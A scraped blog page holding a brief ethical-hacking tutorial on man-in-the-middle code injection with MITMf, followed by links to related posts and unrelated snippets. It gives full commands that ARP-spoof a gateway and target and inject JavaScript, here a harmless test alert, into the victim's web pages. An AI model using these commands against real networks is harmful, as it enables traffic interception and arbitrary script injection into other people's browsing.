MITM - Code Injection

  • Inject javascript or HTML code into pages.
  • Code gets executed on target machine.
  • Use - - inject plugin.

Code can be:

1. Stored on a local file --js-file or --html-file

2. Stored online --js-url or --html-url

3. Or you can supply the code through the terminal --js-payload or --html-payload

Usage Case 1:

python2 mitmf.py --arp --spoof -i eth0 --gateway 10.0.0.1 --targets 10.0.0.22 --inject --js-payload "alter('test');"

The inection code works.

Usage case2:

Edit the js file and save it as alert.js in the root folder.

alert('test');

Run the commands on the terminal.

python2 mitmf.py --arp --spoof -i eth0 --gateway 10.0.0.1 --target 10.0.0.22 --inject --js-file /root/alert.js

The injection file works...

Ethical Hacking - NETWORK PENETRATION TESTING(21)的更多相关文章

  1. Ethical Hacking - NETWORK PENETRATION TESTING(15)

    ARP Poisoning - arpspoof Arpspoof is a tool part of a suit called dsniff, which contains a number of ...

  2. Ethical Hacking - NETWORK PENETRATION TESTING(22)

    MITM - Wireshark WIreshark is a network protocol analyser that is designed to help network administa ...

  3. Ethical Hacking - NETWORK PENETRATION TESTING(14)

    MITM - ARP Poisoning Theory Man In The Middle Attacks - ARP Poisoning This is one of the most danger ...

  4. Ethical Hacking - NETWORK PENETRATION TESTING(13)

    Nmap Nmap is a network discovery tool that can be used to gather detailed information about any clie ...

  5. Ethical Hacking - NETWORK PENETRATION TESTING(12)

    Post Connection Attacks Sophisticated attacks that can be used after connecting to the target AP. Ga ...

  6. Ethical Hacking - NETWORK PENETRATION TESTING(11)

    Securing your Network From the Above Attacks. Now that we know how to test the security of all known ...

  7. Ethical Hacking - NETWORK PENETRATION TESTING(10)

    WPA Craking WPA was designed to address the issues in WEP and provide better encryption. The main is ...

  8. Ethical Hacking - NETWORK PENETRATION TESTING(8)

    WEP Cracking Basic case Run airdump-ng to log all traffic from the target network. airodump-ng --cha ...

  9. Ethical Hacking - NETWORK PENETRATION TESTING(7)

    Gaining Access to encrypted networks Three main encryption types: 1. WEP 2.WPA 3.WPA2 WEP Cracking W ...

随机推荐

  1. tcpdump抓包工具的基本使用

    为了更好的深入理解计算机网络等相关知识,例如TCP\UDP\IP等,我们就必须利用tcpdump.Wireshark等工具对网络进行分析.本篇博文主要记录一下tcpdump这个网络分析利器的一些基本使 ...

  2. 迁移AndroidX

    1. 前言 AndroidX replaces the original support library APIs with packages in the androidx namespace. O ...

  3. SQL常用取整函数

    1.Round(column_name,decimals):用于把数值字段舍入为指定的小数位数 2.Floor(column_name): 向下取整,主要用于获得小于等于数值表达式的最大整数. 3.C ...

  4. git 提交流程

    Git提交流程: 1. Menu remote > (拉取)fetch 2. 重新扫描(rescan) 3. 缓存改动(stage change) 4. 写注释后提交(commit) 5. Me ...

  5. vue学习第一天:v-bind的使用(让属性绑定变量)

    v-bind的使用 v-bind: 是vue中,提供用于绑定属性的指令  例: <input type="button" value="按钮" title ...

  6. awk 命令使用入门

    Linux 下处理和分析文本文件内容,AWK 命令是一个强有力的工具.特别是文件内容是以行和列的形式排版的时候,AWK 就是命令行界的 Excel 啊! 简单的 awk 命令可以直接在命令行中使用,复 ...

  7. MySQL8.0窗口函数实践及小结

    MySQL8.0之前,做数据排名统计等相当痛苦,因为没有像Oracle.SQL SERVER .PostgreSQL等其他数据库那样的窗口函数.但随着MySQL8.0中新增了窗口函数之后,针对这类统计 ...

  8. 用Creator实现一个擀面的效果

    先上几张效果图 怎么实现的呢? 节点介绍 1是背景图,可以忽略:2 是准备好的面团:3 是擀好的面饼先隐藏:4 是需要绘制的节点:5 是擀面杖. 制作开始 首先在view上挂一个mask,并且设置为模 ...

  9. vue全家桶(2.6)

    3.9.滚动行为 设置滚动行为的作用是导航到新路由时,让页面滚动到你想要的位置. const router = new VueRouter({ routes: [...], scrollBehavio ...

  10. Convert to Ones

    Convert to Ones 'You've got a string a 1 , a 2 ,-, a n a1,a2,-,an , consisting of zeros and ones. Le ...